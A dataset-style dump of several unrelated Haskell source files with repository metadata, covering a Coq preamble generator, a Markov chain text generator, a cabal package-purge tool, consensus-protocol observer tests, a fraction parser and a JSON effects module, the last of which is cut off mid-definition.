code stringlengths 5 1.03M | repo_name stringlengths 5 90 | path stringlengths 4 158 | license stringclasses 15 values | size int64 5 1.03M | n_ast_errors int64 0 53.9k | ast_max_depth int64 2 4.17k | n_whitespaces int64 0 365k | n_ast_nodes int64 3 317k | n_ast_terminals int64 1 171k | n_ast_nonterminals int64 1 146k | loc int64 -1 37.3k | cycloplexity int64 -1 1.31k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
module GHCJS.DOM.WebKitAnimationEvent (
) where
| manyoo/ghcjs-dom | ghcjs-dom-webkit/src/GHCJS/DOM/WebKitAnimationEvent.hs | mit | 50 | 0 | 3 | 7 | 10 | 7 | 3 | 1 | 0 |
{-|
Module : HsToCoq.Coq.Preamble
Description : Static preamble for all hs-to-coq output
Copyright : Copyright © 2017 Antal Spector-Zabusky, University of Pennsylvania
License : MIT
Maintainer : antal.b.sz@gmail.com
Stability : experimental
-}
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE OverloadedLists #-}
module HsToCoq.Coq.Preamble
( staticPreamble
, builtInAxioms
) where
import Data.Text (Text)
import qualified Data.Text as T
import HsToCoq.Coq.Gallina
import HsToCoq.Coq.Gallina.Orphans ()
import qualified Data.Map as M
import Data.Bifunctor
-- | Fixed Coq text emitted at the top of every hs-to-coq output file:
-- implicit-argument settings plus the two @Require@s needed by generated
-- fixpoints ('Coq.Program.Tactics', 'Coq.Program.Wf').
staticPreamble :: Text
staticPreamble = T.unlines
  [ "(* Default settings (from HsToCoq.Coq.Preamble) *)"
  , ""
  , "Generalizable All Variables."
  , ""
  , "Unset Implicit Arguments."
  , "Set Maximal Implicit Insertion."
  , "Unset Strict Implicit."
  , "Unset Printing Implicit Defensive."
  , ""
  , "Require Coq.Program.Tactics."
  , "Require Coq.Program.Wf."
  ]
-- | When a free variable of this name appears in the output,
-- an axiom of the type given here is added to the preamble
-- | Axioms added to the preamble on demand: when one of these names occurs
-- free in the output, an axiom of the paired type is emitted.  Currently the
-- only entry is @missingValue : forall {a}, a@.
builtInAxioms :: M.Map Qualid Term
builtInAxioms = M.fromList $ map (first Bare)
  [ "missingValue" =: Forall [ ImplicitBinders (pure (Ident (Bare "a"))) ] a
  ]
  where
    -- Term-level type variable @a@ (via OverloadedStrings).
    a = "a"
    -- Local pairing operator so the table reads @name =: type@.
    (=:) = (,)
    infix 0 =:
| antalsz/hs-to-coq | src/lib/HsToCoq/Coq/Preamble.hs | mit | 1,284 | 0 | 17 | 241 | 207 | 126 | 81 | 30 | 1 |
{-# LANGUAGE NoMonomorphismRestriction #-}
{-# LANGUAGE OverloadedStrings #-}
module Markov where
import Control.Applicative
import qualified Control.Monad.Random as R
import Data.List (foldl')
import qualified Data.HashMap.Lazy as M
import System.Random.Mersenne.Pure64
import Data.Hashable
import qualified Data.Text as T
-- | Intermediate (buildable) chain: each state maps to its weighted
-- successor list, or 'Nothing' when the state is terminal.
type MarkovI a = M.HashMap a (Maybe [(a, Rational)])
-- | Compiled chain: successor lists turned into ready-to-run random
-- actions (see 'fromMarkovI').
newtype Markov g a = Markov{ getMarkov :: M.HashMap a (Maybe (R.Rand g a)) }
-- | Errors are reported as plain strings.
type Err = String
-- | Result of a single transition step: failure, a new value plus the
-- updated generator, or the end of the chain.
data Outcome g a =
  Error Err
  | Val a g
  | End
  deriving (Show, Eq)
-- | Take one step from state @x@: 'Error' if @x@ is not in the table,
-- 'End' if @x@ is terminal, otherwise a sampled successor plus the
-- advanced generator.
runMarkov1 :: (R.RandomGen g, Hashable a, Eq a) => Markov g a -> g -> a -> Outcome g a
runMarkov1 mkv gen x =
  case M.lookup x (getMarkov mkv) of
    Nothing            -> Error "Internal error; cannot find value"
    Just Nothing       -> End
    Just (Just sample) -> let (nxt, gen') = R.runRand sample gen
                          in Val nxt gen'
-- | Walk the chain for at most @n@ steps starting from @x@, collecting the
-- visited states (including @x@ itself).  Stops early at a terminal state.
runMarkov :: (R.RandomGen g, Hashable a, Eq a) => Integer -> Markov g a -> g -> a -> Either Err [a]
runMarkov n mkv gen x = go n
  where
    -- NOTE: @go@ is only ever applied to @n@, so @m == n@ here and the
    -- @(n-1)@ in the recursive call is effectively @m-1@; the recursion
    -- continues via a fresh top-level call carrying the updated generator.
    go m | m <= 0 = Right []
         | otherwise = (x:) <$> case runMarkov1 mkv gen x of
            Val a g -> runMarkov (n-1) mkv g a
            End -> Right []
            Error err -> Left err
-- | Compile a buildable chain into a runnable one by turning every
-- weighted successor list into a random sampling action.
fromMarkovI :: R.RandomGen g => MarkovI a -> Markov g a
fromMarkovI table = Markov (M.map (fmap R.fromList) table)
-- | Record a transition @k -> v@ with weight @r@, prepending to any
-- successors already recorded for @k@.  A previous terminal marker
-- ('Just Nothing') for @k@ is overwritten.
insertMkvI :: (Hashable a, Eq a) => Rational -> a -> a -> MarkovI a -> MarkovI a
insertMkvI r k v mkv = M.insert k (Just successors) mkv
  where
    successors = case M.lookup k mkv of
      Just (Just existing) -> (v, r) : existing
      _                    -> [(v, r)]
-- | Mark @key@ as terminal: it has no successors in the chain.
insertEnd :: (Hashable a, Eq a) => a -> MarkovI a -> MarkovI a
insertEnd key table = M.insert key Nothing table
-- | Insert a sequence of consecutive-state pairs, each with weight 1, and
-- mark the final state of the sequence as terminal.
insertMkvPairsInto :: (Hashable a, Eq a) => MarkovI a -> [(a, a)] -> MarkovI a
insertMkvPairsInto mkv [] = mkv
insertMkvPairsInto mkv ps = insertEnd lst $ foldl' (flip (uncurry (insertMkvI 1))) mkv ps
  -- @last@ is safe: the empty list is handled by the clause above.
  where lst = snd $ last ps
-- | Build a runnable chain directly from explicit successor lists; an
-- empty list marks that state as terminal.
fromList :: (Hashable a, Eq a, R.RandomGen g) => [(a, [(a, Rational)])] -> Markov g a
fromList = Markov . foldl' step M.empty
  where
    step table (key, outcomes)
      | null outcomes = M.insert key Nothing table
      | otherwise     = M.insert key (Just (R.fromList outcomes)) table
-- | All pairs of adjacent words in the text; empty or one-word input
-- yields no pairs.
wordPairs :: T.Text -> [(T.Text, T.Text)]
wordPairs txt = zip ws (drop 1 ws)
  where ws = T.words txt
-- | Fold one sentence's adjacent word pairs into the chain table.
insertSentence :: MarkovI T.Text -> T.Text -> MarkovI T.Text
insertSentence table sentence = insertMkvPairsInto table (wordPairs sentence)
-- | Build a runnable word chain from a corpus of sentences.
fromSentences :: R.RandomGen g => [T.Text] -> Markov g T.Text
fromSentences sentences = fromMarkovI (foldl' insertSentence M.empty sentences)
-- | Generate up to @n@ words starting from the first word of a randomly
-- chosen sentence.
--
-- Fixes relative to the original:
--   * @runMarkov@ expects an 'Integer' step count but @n@ is an 'Int';
--     convert with 'fromIntegral'.
--   * @head . T.words@ crashed on whitespace-only sentences and
--     @R.uniform@ crashed on an empty corpus; both now degrade to a
--     'Left' result instead.
runFromSentences :: Int -> [T.Text] -> IO (Either Err T.Text)
runFromSentences n sentences = do
  g <- newPureMT
  -- First word of each sentence; sentences with no words are skipped.
  let hds = [w | (w:_) <- map T.words sentences]
  case hds of
    [] -> return (Left "runFromSentences: no non-empty sentences to seed from")
    _  -> do
      seed <- R.uniform hds
      return $ T.unwords <$> runMarkov (fromIntegral n) (fromSentences sentences) g seed
| 5outh/markov-sim | Markov.hs | mit | 2,784 | 0 | 15 | 700 | 1,212 | 627 | 585 | 62 | 3 |
module Main (main) where
import ProjectEuler.CommandLine
| Javran/Project-Euler | exe/Main.hs | mit | 58 | 0 | 4 | 7 | 14 | 9 | 5 | 2 | 0 |
{-# LANGUAGE EmptyDataDecls, EmptyCase, ExistentialQuantification,
ScopedTypeVariables, NoMonomorphismRestriction, Rank2Types,
PatternSynonyms #-}
module MAlonzo.Code.Qplfa.Naturals where
import MAlonzo.RTE (coe, erased, AgdaAny, addInt, subInt, mulInt,
quotInt, remInt, geqInt, ltInt, eqInt, eqFloat, add64, sub64,
mul64, quot64, rem64, lt64, eq64, word64FromNat, word64ToNat)
import qualified MAlonzo.RTE
import qualified Data.Text
name4 = "plfa.Naturals.N"
d4 = ()
data T4 = C6 | C8 T4
| manhong2112/CodeColle | Agda/MAlonzo/Code/Qplfa/Naturals.hs | mit | 557 | 0 | 6 | 123 | 115 | 75 | 40 | 12 | 1 |
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE DeriveDataTypeable #-}
{-# LANGUAGE TemplateHaskell #-}
{-# LANGUAGE CPP #-}
module Main where
import Data.Maybe (listToMaybe, mapMaybe)
import Stackage.CLI
import Filesystem
import Control.Exception (Exception, catch)
import Control.Monad
import Control.Monad.Catch (MonadThrow, throwM)
import Control.Applicative
import Data.Monoid
import Data.Typeable (Typeable)
import Options.Applicative (Parser, flag, long, help)
import System.Process (readProcess)
import Data.Char (toLower)
import System.IO (stdout, stderr, hFlush, hPutStrLn)
import qualified Data.Text.Encoding as T
import qualified Data.Text as T
import System.Environment (getArgs)
import System.Exit (exitFailure)
import qualified Paths_stackage_cabal as CabalInfo
import Text.Parsec hiding ((<|>), many)
-- | Parser over 'String' input with no user state.
type ParsecParser = Parsec String ()
-- | Whether to ask before unregistering ('Prompt') or just do it ('Force').
data Force = Prompt | Force
-- | Command-line options for the purge command.
data PurgeOpts = PurgeOpts
  { purgeOptsForce :: Force }
-- | One package database together with the packages registered in it,
-- as reported by @ghc-pkg list@.
data PackageGroup = PackageGroup
  { packageGroupDb :: String
  , packageGroupPackages :: [String]
  }
-- | Thrown when the @ghc-pkg list@ output cannot be parsed.
data PurgeException
  = ParsePackagesError ParseError
  deriving (Show, Typeable)
instance Exception PurgeException
-- | Print @str@ (flushing so it appears before input is read) and
-- return one line typed by the user.
prompt :: String -> IO String
prompt str = do
  putStr str
  hFlush stdout
  getLine
-- | Run the action on the wrapped value, or do nothing for 'Nothing'.
whenJust :: Monad m => Maybe a -> (a -> m ()) -> m ()
whenJust mb act = maybe (return ()) act mb
-- | Pick the singular form for a count of exactly 1, the plural otherwise
-- (including 0 and negative counts).
pluralize :: Int -> a -> a -> a
pluralize count singular plural
  | count == 1 = singular
  | otherwise  = plural
-- | Unregister each package from the given package database by shelling
-- out to @ghc-pkg unregister --force@, logging each package as it goes.
-- The subprocess output is discarded.
unregisterPackages :: String -> [String] -> IO ()
unregisterPackages packageDb = mapM_ unregister where
  unregister package = do
    putStrLn $ "Unregistering: " <> package
    _ <- readProcess "ghc-pkg" (args package) ""
    return ()
  -- Arguments for one ghc-pkg invocation, targeting @packageDb@.
  args package =
    [ "unregister"
    , package
    , "--force"
    ] <> dbToArgs (Just packageDb)
-- | Read the sandbox package-db path from @cabal.sandbox.config@ in the
-- current directory: the first line starting with @\"package-db: \"@.
-- Returns 'Nothing' when the file does not exist or no such line is found.
parsePackageDb :: IO (Maybe String)
parsePackageDb = do
  cabalSandboxConfigExists <- isFile "cabal.sandbox.config"
  if cabalSandboxConfigExists
    then do
      t <- Filesystem.readTextFile "cabal.sandbox.config"
      -- stripPrefix yields Just the remainder only for the package-db line.
      let packageDbLine = T.stripPrefix "package-db: "
      return $ fmap T.unpack $ listToMaybe $ mapMaybe packageDbLine $ T.lines t
    else
      return Nothing
-- | Turn an optional package-db path into @ghc-pkg@ arguments:
-- no path means no extra arguments.
dbToArgs :: Maybe String -> [String]
dbToArgs = maybe [] (\packageDb -> ["--package-db", packageDb])
-- | Discover the global package database path by asking @ghc-pkg list@
-- about a package that certainly does not exist: the first output line is
-- then the global db path followed by a colon.
getGlobalPackageDb :: IO (Maybe String)
getGlobalPackageDb = do
  let fakePackage = "asdklfjasdklfajsdlkghaiwojgadjfkq"
  output <- readProcess "ghc-pkg" ["list", fakePackage] ""
  return $ fmap init $ listToMaybe (lines output)
  -- fmap init is to get rid of the trailing colon
-- | Run @ghc-pkg list@ (optionally against a specific package db) and
-- parse its output into database/package groups.  Throws
-- 'ParsePackagesError' via 'parsePackages' on malformed output.
getPackages :: Maybe String -> IO [PackageGroup]
getPackages mPackageDb = parsePackages =<< readProcess "ghc-pkg" args "" where
  args = ["list"] <> dbToArgs mPackageDb
-- | Parse the raw @ghc-pkg list@ output; a parse failure is rethrown as
-- 'ParsePackagesError' in the ambient 'MonadThrow'.
parsePackages :: MonadThrow m => String -> m [PackageGroup]
parsePackages
  = either (throwM . ParsePackagesError) return
  . parse packagesParser ""
-- #28
#if !MIN_VERSION_parsec(3,1,6)
crlf :: ParsecParser Char
crlf = char '\r' *> char '\n' <?> "crlf new-line"
endOfLine :: ParsecParser Char
endOfLine = newline <|> crlf <?> "new-line"
#endif
ending :: ParsecParser ()
ending = eof <|> void endOfLine
packagesParser :: ParsecParser [PackageGroup]
packagesParser = many1 parseGroup
parseGroup :: ParsecParser PackageGroup
parseGroup = PackageGroup <$> parseDb <*> parseDbPackages <* many endOfLine
parseDb :: ParsecParser String
parseDb = manyTill anyChar $ try (char ':' *> ending)
parseDbPackages :: ParsecParser [String]
parseDbPackages = try parseNoPackages <|> many1 parsePackage
parseNoPackages :: ParsecParser [String]
parseNoPackages = many1 (char ' ') *> string "(no packages)" *> ending *> pure []
parsePackage :: ParsecParser String
parsePackage = many1 (char ' ') *> manyTill anyChar ending
purge :: PurgeOpts -> IO ()
purge opts = do
cabalConfigExists <- isFile "cabal.config"
when cabalConfigExists $ do
removeFile "cabal.config"
globalPackageDbMay <- getGlobalPackageDb
sandboxPackageDbMay <- parsePackageDb
let displaySandbox s
| Just s == globalPackageDbMay =
"(Global) " <> s
| Just s == sandboxPackageDbMay =
"(Sandbox) " <> s
| otherwise = s
packages <- getPackages sandboxPackageDbMay
forM_ packages $ \(PackageGroup db packages) -> do
putStrLn $ displaySandbox db
let nPackages = length packages
let showNPackages
= show nPackages
<> " "
<> pluralize nPackages "package" "packages"
putStrLn
$ "Detected "
<> showNPackages
<> " to purge from this database"
when (nPackages > 0) $ do
when (nPackages < 15) $ mapM_ putStrLn packages
shouldUnregister <- case purgeOptsForce opts of
Force -> do
putStrLn $ "(--force) Unregistering " <> showNPackages
return True
Prompt -> do
line <- prompt
$ "Unregister " <> showNPackages <> " (y/n)? [default: n] "
case map toLower line of
"y" -> return True
"yes" -> return True
_ -> return False
when shouldUnregister $ unregisterPackages db packages
return ()
-- | Command-line parser: a single @--force@ flag; absent means 'Prompt'.
purgeOptsParser :: Parser PurgeOpts
purgeOptsParser = fmap PurgeOpts forceFlag
  where
    forceFlag =
      flag Prompt Force
        (long "force" <> help "Purge all packages without prompt")
version :: String
version = $(simpleVersion CabalInfo.version)
header :: String
header = "Delete cabal.config and purge your package database"
progDesc :: String
progDesc = header
-- | Top-level handler: report the parse failure on stderr and exit with a
-- non-zero status.  The 'ParseError' detail is intentionally not printed.
handlePurgeExceptions :: PurgeException -> IO ()
handlePurgeExceptions (ParsePackagesError _) = do
  hPutStrLn stderr $ "Failed to parse ghc-pkg output"
  exitFailure
-- | Entry point: parse the command line (no subcommands), then run the
-- purge, converting any 'PurgeException' into a clean error exit.
main :: IO ()
main = do
  (opts, ()) <- simpleOptions
    version
    header
    progDesc
    purgeOptsParser -- global parser
    empty -- subcommands
  purge opts `catch` handlePurgeExceptions
| fpco/stackage-cabal | main/Purge.hs | mit | 5,869 | 0 | 23 | 1,219 | 1,683 | 850 | 833 | 162 | 4 |
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE ScopedTypeVariables #-}
module Test.Observer (observer_tests) where
import Hetcons.Hetcons_Exception ( Hetcons_Exception )
import Hetcons.Instances_Proof_of_Consensus ( observers_proven )
import Hetcons.Observer (Observer, basic_observer_server )
import Hetcons.Participant ( current_nanoseconds )
import Hetcons.Send_Message_IO
( Address_Book
,default_Address_Book
,send_Message_IO
,domain_name )
import Hetcons.Signed_Message
( Encodable
,encode
,Recursive_1b
,Recursive_1a
,Verified
,Recursive_2b
,Recursive_Proof_of_Consensus
,Monad_Verify(verify)
,sign )
import Test.Util ()
import Charlotte_Consts ( sUPPORTED_SIGNED_HASH_TYPE_DESCRIPTOR )
import qualified Hetcons_Observer as Observer ( process )
import qualified Hetcons_Observer_Iface as Observer
( ping, phase_2b )
import Hetcons_Observer_Iface ( Hetcons_Observer_Iface )
import Hetcons_Participant ( process )
import Hetcons_Participant_Iface
( Hetcons_Participant_Iface, ping, proposal_1a, phase_1b )
import Charlotte_Types
( Participant_ID(participant_ID_crypto_id, participant_ID_address)
,default_Participant_ID
,Slot_Value(slot_Value_slot, slot_Value_value_payload)
,default_Slot_Value
,Observers(observers_observer_quorums)
,default_Observers
,Proposal_1a(proposal_1a_observers, proposal_1a_timestamp
,proposal_1a_value)
,default_Proposal_1a
,Public_Crypto_Key(public_Crypto_Key_public_crypto_key_x509)
,default_Public_Crypto_Key
,Crypto_ID(crypto_ID_public_crypto_key)
,default_Crypto_ID
,Signed_Message
,Phase_1b(phase_1b_proposal)
,default_Phase_1b
,Phase_2b(phase_2b_phase_1bs)
,default_Phase_2b
,Host_Address(host_Address_dns_name)
,default_Host_Address
,Timestamp
,Address(address_port_number, address_host_address)
,default_Address
)
import Control.Concurrent ( forkIO, ThreadId )
import Control.Concurrent.MVar ( putMVar, takeMVar, newEmptyMVar )
import Crypto.Random ( getSystemDRG, DRG, withDRG )
import qualified Data.ByteString.Lazy as ByteString
( singleton, readFile, empty )
import Data.ByteString.Lazy ( ByteString )
import Data.HashSet ( fromList )
import Test.HUnit
( Test(TestList, TestLabel, TestCase), assertEqual, assertBool )
import qualified Data.HashMap.Strict as HashMap ( fromList )
import Data.HashMap.Strict ()
import Data.Text.Lazy ( pack )
import Thrift.Server ( runBasicServer )
doubleGen :: (DRG g) => g -> (g,g)
doubleGen g = withDRG g (return g)
listGen :: (DRG g) => g -> [g]
listGen g = g:(listGen (snd (withDRG g (return ()))))
sample_payload :: Integer
sample_payload = 1337
sample_message :: IO (Either Hetcons_Exception Signed_Message)
sample_message = sample_sign sample_payload
sample_sign :: (Encodable a) => a -> IO (Either Hetcons_Exception Signed_Message)
sample_sign payload =
do { gen <- getSystemDRG
; cert <- ByteString.readFile "test/cert.pem"
; private <- ByteString.readFile "test/key.pem"
; let crypto_id = default_Crypto_ID {crypto_ID_public_crypto_key =
Just (default_Public_Crypto_Key {
public_Crypto_Key_public_crypto_key_x509 = Just cert})}
; return $ sign crypto_id private sUPPORTED_SIGNED_HASH_TYPE_DESCRIPTOR gen payload}
sample_id cert port =
default_Participant_ID {
participant_ID_address =
default_Address {
address_host_address =
default_Host_Address {
host_Address_dns_name = Just $ pack "localhost"}
,address_port_number = port}
,participant_ID_crypto_id =
default_Crypto_ID {
crypto_ID_public_crypto_key =
Just (default_Public_Crypto_Key {
public_Crypto_Key_public_crypto_key_x509 = Just cert})}}
-- sample_1a :: Proposal_1a
sample_1a now recipients = default_Proposal_1a {
proposal_1a_value = encode default_Slot_Value {
slot_Value_value_payload = ByteString.singleton 42
,slot_Value_slot = 6}
,proposal_1a_timestamp = now
,proposal_1a_observers = Just default_Observers {
observers_observer_quorums = Just $ HashMap.fromList
[(r, fromList [fromList recipients]) | r <- recipients] }}
-- | Commute 'Either' over a monad: a 'Left' becomes a pure 'Left',
-- while a 'Right' action is run and its result wrapped in 'Right'.
deStupidify :: (Monad m) => Either a (m b) -> (m (Either a b))
deStupidify (Left err)     = return (Left err)
deStupidify (Right action) = fmap Right action
data Dummy_Participant = Dummy_Participant {
on_ping :: IO ()
,on_proposal_1a :: Signed_Message -> IO ()
,on_phase_1b :: Signed_Message -> IO ()
}
instance Hetcons_Participant_Iface Dummy_Participant where
ping = on_ping
proposal_1a v x _ = on_proposal_1a v x
phase_1b v x _ = on_phase_1b v x
dummy_participant_server :: (Integral a) => a -> Dummy_Participant -> IO ThreadId
dummy_participant_server port dummy = forkIO $ runBasicServer dummy process (fromIntegral port)
data Dummy_Observer = Dummy_Observer {
dummy_observer_on_ping :: IO ()
,dummy_observer_on_phase_2b :: Signed_Message -> IO ()
}
instance Hetcons_Observer_Iface Dummy_Observer where
ping = dummy_observer_on_ping
phase_2b = dummy_observer_on_phase_2b
dummy_observer_server :: (Integral a) => a -> Dummy_Observer -> IO ThreadId
dummy_observer_server port dummy = forkIO $ runBasicServer dummy Observer.process (fromIntegral port)
launch_dummy_observer :: (Integral a) => a -> IO (a, Timestamp, Address_Book, ByteString)
launch_dummy_observer port = do
{ now <- current_nanoseconds
; receipt_2b <- newEmptyMVar
; address_book <- default_Address_Book
; cert <- ByteString.readFile "test/cert.pem"
; (Right signed_1a) <- sample_sign $ sample_1a now [sample_id cert (fromIntegral port)]
; let (Right (v1a :: (Verified (Recursive_1a Slot_Value)))) = verify signed_1a
; (Right signed_1b) <- sample_sign $ default_Phase_1b { phase_1b_proposal = signed_1a }
; let (Right (v1b :: (Verified (Recursive_1b Slot_Value)))) = verify signed_1b
; (Right signed_2b) <- sample_sign $ default_Phase_2b { phase_2b_phase_1bs = fromList [signed_1b]}
; let (Right (v2b :: (Verified (Recursive_2b Slot_Value)))) = verify signed_2b
; dummy_observer <- dummy_observer_server port (Dummy_Observer { dummy_observer_on_ping = return ()
, dummy_observer_on_phase_2b = putMVar receipt_2b})
; send_Message_IO address_book ByteString.empty v2b
; takeMVar receipt_2b >>= assertEqual "received 2b is not sent 2b" signed_2b
; return (port, now, address_book, cert)
}
launch_observer :: (Integral a) => a -> IO (a, Timestamp, Address_Book, ByteString, ByteString)
launch_observer port = do
{ (used_port, now, address_book, cert) <- launch_dummy_observer port
; let new_port = used_port + 1
; private <- ByteString.readFile "test/key.pem"
; proof_receipt <- newEmptyMVar
; observer <- (basic_observer_server
(default_Crypto_ID {
crypto_ID_public_crypto_key =
Just (default_Public_Crypto_Key {
public_Crypto_Key_public_crypto_key_x509 = Just cert})})
private
(fromIntegral new_port)
(putMVar proof_receipt :: ((Verified (Recursive_Proof_of_Consensus Slot_Value)) -> IO ())))
; (Right signed_1a) <- sample_sign $ sample_1a now [sample_id cert (fromIntegral new_port)]
; let (Right (v1a :: (Verified (Recursive_1a Slot_Value)))) = verify signed_1a
; (Right signed_1b) <- sample_sign $ default_Phase_1b { phase_1b_proposal = signed_1a }
; let (Right (v1b :: (Verified (Recursive_1b Slot_Value)))) = verify signed_1b
; (Right signed_2b) <- sample_sign $ default_Phase_2b { phase_2b_phase_1bs = fromList [signed_1b]}
; let (Right (v2b :: (Verified (Recursive_2b Slot_Value)))) = verify signed_2b
; send_Message_IO address_book ByteString.empty v2b
; assertBool "have launched an observer" True
; received_proof <- takeMVar proof_receipt
; assertEqual "incorrect observers proven" ("localhost:"++(show $ fromIntegral new_port)++",") $
foldr (\n x -> x ++ (domain_name n) ++ ":"++ (show $ address_port_number $ participant_ID_address n) ++",") "" $ observers_proven received_proof
; return (new_port, now, address_book, cert, private)
}
observer_tests = TestList [
TestLabel "Verify we can launch at least a dummy observer" (
TestCase ( launch_dummy_observer 86000 >> return ()))
,TestLabel "Verify we can launch at a basic observer" (
TestCase ( launch_observer 86001 >> return ()))
]
| isheff/hetcons | test/Test/Observer.hs | mit | 8,771 | 0 | 17 | 1,833 | 2,254 | 1,236 | 1,018 | 176 | 1 |
{-# LANGUAGE OverloadedStrings #-}
module Fractions where
import Control.Applicative
import Data.Ratio ((%))
import Text.Trifecta
badFractions :: [String]
badFractions = ["1/0", "10"]
goodFractions :: [String]
goodFractions = ["1/2", "2/1"]
-- | Parse @numerator/denominator@ into a 'Rational'.
-- NOTE: a zero denominator makes '%' throw; see 'virtuousParser' for the
-- checked variant.
parseFraction :: Parser Rational
parseFraction = do
  num <- decimal
  _ <- char '/'
  den <- decimal
  return (num % den)
-- | Like 'parseFraction', but reject a zero denominator with a parser
-- failure instead of letting '%' throw at evaluation time.
virtuousParser :: Parser Rational
virtuousParser = do
  num <- decimal
  _ <- char '/'
  den <- decimal
  if den == 0
    then fail "Denominator cannot be zero"
    else return (num % den)
-- | Demo driver: run the checked parser over the good and bad samples,
-- printing each result ('Success'/'Failure').
mainFractions :: IO ()
mainFractions = do
  mapM_ (print . parseString virtuousParser mempty) goodFractions
  mapM_ (print . parseString virtuousParser mempty) badFractions
  -- NOTE(review): 'print' renders the quotes ("foo"); presumably a
  -- leftover debug marker.
  print "foo"
| JoshuaGross/haskell-learning-log | Code/Haskellbook/catchall/src/Fractions.hs | mit | 850 | 0 | 12 | 181 | 245 | 125 | 120 | 28 | 2 |
{-# LANGUAGE DeriveFunctor #-}
{-# LANGUAGE DeriveDataTypeable #-}
{-# LANGUAGE FlexibleContexts #-}
{-# LANGUAGE ScopedTypeVariables #-}
{-# LANGUAGE RankNTypes #-}
{-# LANGUAGE ExistentialQuantification #-}
{-# LANGUAGE TypeOperators #-}
module Control.Eff.JSON
where
import Data.Data (Typeable)
import Data.ByteString.Lazy hiding (unzip, empty)
import Data.Text hiding (empty)
import Data.Aeson
import Data.Aeson.Types
import qualified Data.HashMap.Strict as HM
import Control.Eff
----------
-- Effects
----------
-- | Effect type for json input effects.
data JSONIn n
= MaybeValue Text (Maybe Value -> n)
| forall a. ThrowJSONError JSONError (a -> n)
deriving (Typeable)
instance Functor JSONIn where
fmap f (MaybeValue t n) = MaybeValue t (f . n)
fmap f (ThrowJSONError e n) = ThrowJSONError e (f . n)
-- | An error occuring during the processing of the effects
data JSONError
= MissingProperty Text
| CantDecodeProperty Text String -- ^ name of property and aeson error message
| CantDecodeObject ByteString
deriving (Show)
maybeValue :: Member JSONIn r => Text -> Eff r (Maybe Value)
maybeValue t = send $ \ next -> inj (MaybeValue t next)
throwJSONError :: Member JSONIn r => JSONError -> Eff r a
throwJSONError err = send $ \ next -> inj (ThrowJSONError err next)
-- | Effect type for json output effects
data JSONOut n
= forall a. ToJSON a => WriteProp Text a (a -> n)
deriving (Typeable)
instance Functor JSONOut where
fmap f (WriteProp t v n) = WriteProp t v (f . n)
writeProp :: (Member JSONOut r, ToJSON a) => Text -> a -> Eff r a
writeProp p v = send $ \ next -> inj (WriteProp p v next)
------------
-- Operators
------------
-- TODO: I need to think ahout the operators. '?' should
-- mean something with maybe, '$' should mean something with
-- effects, but i does not seem to be consistent atm.
-- | Write an ordinary value to the JSON-output
(<:) :: (ToJSON a, Member JSONOut r)
=> Text -> a -> Eff r a
(<:) = writeProp
infixl 0 <:
-- | Write effectful value to the JSON-output
(<$) :: (ToJSON a, Member JSONOut r)
=> Text -> Eff r a -> Eff r a
p <$ e = e >>= writeProp p
infixl 0 <$
-- | Write the outputs of some monads to a list in the output
(<$:) :: (ToJSON a, Member JSONOut r)
=> Text -> [Eff r a] -> Eff r [a]
p <$: ms = do
xs <- sequence . fmap extract $ ms
let (json, res) = unzip xs
p <: toJSON json
return res
infixl 0 <$:
-- | Write the json output of the monad to the property
(<$.) :: Member JSONOut r
=> Text -> Eff r a -> Eff r a
p <$. m = do
(val, res) <- extract m
p <: val
return res
infixl 0 <$.
-- | Get the property if it is there.
maybeProp :: (FromJSON a, Member JSONIn r)
=> Text -> Eff r (Maybe a)
maybeProp p = do
val <- maybeValue p
case val of
Nothing -> return Nothing
Just v -> case parseEither parseJSON v of
Left err -> throwJSONError $ CantDecodeProperty p err
Right res -> return . Just $ res
-- | Get the property or throw error if that is not possible
prop :: (FromJSON a, Member JSONIn r)
=> Text -> Eff r a
prop p = do
val <- maybeProp p
case val of
Nothing -> throwJSONError $ MissingProperty p
Just val -> return val
-- | Use the value of a property to get a new monad.
($>) :: (FromJSON a, Member JSONIn r)
=> Text -> (a -> Eff r b) -> Eff r b
p $> m = prop p >>= m
infixl 0 $>
-- | Use the value of a property to get a new monad if it is there.
(?>) :: (FromJSON a, Member JSONIn r )
=> Text -> (a -> Eff r b) -> Eff r (Maybe b)
p ?> m = do
val <- maybeProp p
case val of
Nothing -> return Nothing
Just v -> do
res <- m v
return $ Just res
infixl 0 ?>
-- | Use the value of a property as input for the monad.
(.$>) :: Member JSONIn r
=> Text -> Eff r a -> Eff r a
p .$> m = do
obj <- prop p
useObject obj m
infixl 0 .$>
-- | Use the value of a property as input for the monad if it is there.
(.?>) :: Member JSONIn r
=> Text -> Eff r a -> Eff r (Maybe a)
p .?> m = do
obj' <- maybeProp p
case obj' of
Nothing -> return Nothing
Just obj -> do
res <- useObject obj m
return . Just $ res
infixl 0 .?>
(.??>) :: (Member JSONIn r, Show err)
=> Text -> Eff r (Either err a) -> Eff r (Maybe a)
p .??> m = do
res <- p .?> m
case res of
Nothing -> return Nothing
Just (Left err) -> throwJSONError . CantDecodeProperty p . show $ err
Just (Right r) -> return . Just $ r
-- | Helper for composition, has higher fixity than read
-- and write operators.
(.$) = ($)
infixr 1 .$
-----------
-- Handlers
-----------
extract :: Member JSONOut r
=> Eff r a -> Eff r (Value, a)
extract eff = go [] (admin eff)
where
go j (Val a) = return (object j, a)
go j (E req) = interpose req (go j) $
\ (WriteProp p v next) -> go ((p, toJSON v):j) (next v)
useObject :: Member JSONIn r
=> Object -> Eff r a -> Eff r a
useObject obj eff = go obj (admin eff)
where
go obj (Val a) = return a
go obj (E req) = interpose req (go obj) $
\ req -> case req of
MaybeValue t next -> go obj (next $ HM.lookup t obj)
ThrowJSONError err _ -> throwJSONError err
runJSONIn :: Object -> Eff (JSONIn :> r) a -> Eff r (Either JSONError a)
runJSONIn obj eff = go obj (admin eff)
where
go obj (Val a) = return . Right $ a
go obj (E req) = handleRelay req (go obj) $
\ req -> case req of
MaybeValue t next -> go obj (next $ HM.lookup t obj)
ThrowJSONError err _ -> return $ Left err
runJSONIn' :: ByteString -> Eff (JSONIn :> r) a -> Eff r (Either JSONError a)
runJSONIn' bs eff =
let dec = decode bs
in case dec of
Just obj -> runJSONIn obj eff
Nothing -> return . Left $ CantDecodeObject bs
runJSONOut :: Eff (JSONOut :> r) a -> Eff r (Value, a)
runJSONOut eff = go [] (admin eff)
where
go j (Val a) = return (object j, a)
go j (E req) = handleRelay req (go j) $
